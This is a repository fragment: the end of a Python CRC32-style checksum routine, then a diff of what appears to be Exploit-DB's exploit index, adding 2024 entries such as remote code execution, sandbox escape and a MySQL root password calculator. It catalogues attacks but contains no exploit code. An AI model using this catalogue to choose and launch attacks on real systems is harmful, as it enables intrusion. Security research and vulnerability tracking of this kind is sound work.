 	const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]
 	result = 0xffffffff
 	for c in magic_str:
 		aux = result & mask
 		aux2 = xor(ord(c), aux)
 		aux3 = xor(const[aux2], (result >> 8))
 		result = aux3
 	result = ~result
 	result = ctypes.c_long(result).value
 	print(result)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5536,6 +5536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java,,2020-02-03,2020-02-03,0,CVE-2019-8449,,,,,
 38551,exploits/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",webapps,java,,2015-10-28,2015-12-08,1,CVE-2015-5603,,,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
 32818,exploits/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",webapps,java,,2009-02-25,2014-04-11,1,OSVDB-52380,,,,,https://www.securityfocus.com/bid/33912/info
 51895,exploits/java/webapps/51895.py,"Karaf v4.4.3 Console - RCE",2024-03-16,"Andrzej Olchawa_ Milenko Starcik",webapps,java,,2024-03-16,2024-03-16,0,,,,,,
 50405,exploits/java/webapps/50405.py,"Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)",2021-10-13,"Mayank Deshmukh",webapps,java,,2021-10-13,2021-10-13,0,CVE-2020-10770,,,,,
 48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java,,2020-02-05,2020-02-05,0,CVE-2020-8495;CVE-2020-8493,,,,,
 48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,,2020-02-17,2020-02-17,0,,,,,,
@ -8983,6 +8984,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44698,exploits/linux/webapps/44698.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,linux,,2018-05-22,2018-05-22,0,,,,,,
 42314,exploits/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",webapps,linux,,2017-07-11,2017-07-11,1,CVE-2017-7175;CVE-2017-6972,,,,http://www.exploit-db.comnfsen-1.3.7.tar.gz,
 42306,exploits/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",webapps,linux,,2017-07-10,2017-07-11,1,CVE-2017-6971,,,,http://www.exploit-db.comnfsen-1.3.7.tar.gz,
 51896,exploits/linux/webapps/51896.txt,"Nokia BMC Log Scanner - Remote Code Execution",2024-03-16,"Carlos Andres Gonzalez_ Matthew Gregory",webapps,linux,,2024-03-16,2024-03-16,0,,,,,,
 41141,exploits/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,webapps,linux,,2017-01-22,2017-01-30,0,CVE-2017-5473,,,,,http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,,2018-07-27,2018-07-27,0,CVE-2018-14328,,,,,
 40378,exploits/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",webapps,linux,,2016-09-13,2016-10-14,0,CVE-2016-5740,,,,,
@ -10519,6 +10521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
 11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,,
 1119,exploits/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - 'modlines' Local Command Execution",2005-07-25,"Georgi Guninski",local,multiple,,2005-07-24,2016-05-25,1,,,,,http://www.exploit-db.comvim-6.3.tar.bz2,
 51898,exploits/multiple/local/51898.c,"vm2 - sandbox escape",2024-03-16,"Calil Khalil",local,multiple,,2024-03-16,2024-03-16,0,,,,,,
 10207,exploits/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0",2009-10-27,"Tavis Ormandy & Julien Tinnes",local,multiple,,2009-10-26,2017-07-14,1,CVE-2009-2267;OSVDB-59441,,2009-11-22-vmware86.tar.gz,,,
 40164,exploits/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys'",2013-03-06,"Artem Shishkin",local,multiple,,2016-07-26,2016-08-07,0,CVE-2013-1406,,,,,
 47171,exploits/multiple/local/47171.sh,"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation",2018-12-30,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-4915,,,,,https://github.com/bcoles/local-exploits/blob/b7da37d557636fdad1974dd407b9ff15139cd271/CVE-2017-4915/cve-2017-4915.sh
@ -31461,6 +31464,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4871,exploits/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,webapps,php,,2008-01-08,,1,OSVDB-42936;CVE-2008-0246;OSVDB-42617;CVE-2008-0245,,,,,
 41304,exploits/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,,
 10403,exploits/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,webapps,php,,2009-12-12,,1,CVE-2006-6377;OSVDB-31850,,,,,
 51897,exploits/php/webapps/51897.txt,"UPS Network Management Card 4 - Path Traversal",2024-03-16,"Víctor García",webapps,php,,2024-03-16,2024-03-16,0,,,,,,
 41254,exploits/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php,,2017-02-06,2017-02-06,0,,,,,,
 9263,exploits/php/webapps/9263.txt,"URA 3.0 - 'cat' SQL Injection",2009-07-27,"Chip d3 bi0s",webapps,php,,2009-07-26,,1,OSVDB-56572;CVE-2009-2895,,,,,
 17937,exploits/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,webapps,php,,2011-10-07,2011-10-07,0,OSVDB-83885,,,,http://www.exploit-db.comurl-shortener-script.zip,
@ -32587,6 +32591,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3622,exploits/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User",2007-04-01,rgod,webapps,php,,2007-03-31,2016-09-29,1,OSVDB-34677;CVE-2005-3811,,,,,
 10653,exploits/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61350;CVE-2009-4678,,,,,
 18290,exploits/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,webapps,php,,2011-12-29,2011-12-29,1,CVE-2011-5026;OSVDB-78070,,,,http://www.exploit-db.comwinn_guestbook_v2.4.8c.zip,
 51893,exploits/php/webapps/51893.txt,"Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)",2024-03-16,tmrswrr,webapps,php,,2024-03-16,2024-03-16,0,,,,,,
 51591,exploits/php/webapps/51591.txt,"WinterCMS < 1.2.3 - Persistent Cross-Site Scripting",2023-07-15,"abhishek morla",webapps,php,,2023-07-15,2023-07-15,0,CVE-2023-37269,,,,,
 39332,exploits/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-27,1,OSVDB-107116,,,,,https://www.securityfocus.com/bid/67481/info
 3686,exploits/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,webapps,php,,2007-04-07,2016-09-30,1,OSVDB-34735;CVE-2007-1928,,,,http://www.exploit-db.comwitshare-0.9.zip,
@ -40518,6 +40523,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44342,exploits/windows/local/44342.txt,"LabF nfsAxe 3.7 - Privilege Escalation",2018-03-26,bzyo,local,windows,,2018-03-26,2018-03-26,0,,,,,,
 46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,,2019-04-22,2019-04-22,0,,Local,,,http://www.exploit-db.comnfsaxe.exe,
 46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,,2019-04-22,2019-04-22,0,,"Buffer Overflow",,,http://www.exploit-db.comnfsaxe.exe,
 51894,exploits/windows/local/51894.py,"LaborOfficeFree 19.10 - MySQL Root Password Calculator",2024-03-16,"Peter Gabaldon",local,windows,,2024-03-16,2024-03-16,0,,,,,,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,,2020-05-12,2020-05-12,0,,,,,,
 40567,exploits/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,local,windows,,2016-10-18,2016-10-18,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-10-18-at-192511.png,http://www.exploit-db.comlanspy_setup.exe,
 46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows,,2018-12-19,2018-12-19,0,,Local,,,http://www.exploit-db.comlanspy_setup_2.0.1.159.exe,